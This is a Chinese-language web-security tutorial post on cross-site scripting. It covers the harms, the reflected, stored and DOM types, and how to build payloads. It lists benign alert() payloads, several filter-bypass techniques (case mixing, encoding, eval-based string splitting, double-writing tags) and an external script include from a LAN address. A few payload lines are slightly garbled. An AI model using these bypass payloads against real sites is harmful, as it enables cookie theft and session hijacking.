成年人的世界,天黑可以矫情,天亮就得拼命,岁月不会一直安逸,无论你当下经历什么,天亮后依然踏着荆棘前行。。。
---- 网易云热评
一、XSS漏洞危害
1、盗取各种用户账号
2、窃取用户cookie
3、劫持用户会话
4、刷流量,执行弹窗
二、漏洞验证
1、在登录框输入下面代码,点击登录
<script>alert(123)</script>
2、弹出对话框,说明存在xss漏洞
三、漏洞分类
1、反射型
只能利用一次,必须构造特殊的连接让目标点击,比如上面的登录界面。
2、存储型
将特殊语句存储到页面,只要目标浏览该网页,就会被***,比如留言板。
3、DOM型
不与服务器进行交互,利用在本地渲染网页时触发
四、payload构造
伪协议
<a href="javascript:alert(123)">aiyou</a>
事件
<img src="./1.jpg" onm ouseover='alert(123)'><img src="#" one rror='alert(123)'><input type="text" onkeydown="alert(123)"><input type="button" onclick="alert(123)"><div style="width:expression(alert(xss))">
五、绕过防护
1、大小写绕过
<SCript>alert(123)</SCript>
2、引号的使用
<img src="#" one rror="alert(123)"/><img src='#' one rror='alert(123)'/><img src=# one rror=alert(123) />
3、“/”代替空格
<img/src='#'/Onerror='alert(123)'>
4、对标签属性值转码
字母 ASCII 十进制编码 十六进制编码
a 97 a a
<a href="javascript:alert(123)">aiyou</a>
5、头插入尾插入
<a href="javascript:alert(123)">aiyou</a>
6、拆分
<script>z='alert'</script><script>z=z+'(123)'</script><script>eval(z)</script>
7、双写绕过
<scrscriptipt>alert(123)</scscriptript>
六、外部调用
1、新建一个xss.js,内容为
alert(213);
2、构建paylaod,提交
<script src="http://192.168.1.129/js/xss.js"></script>
禁止非法,后果自负
欢迎关注公众号:web安全工具库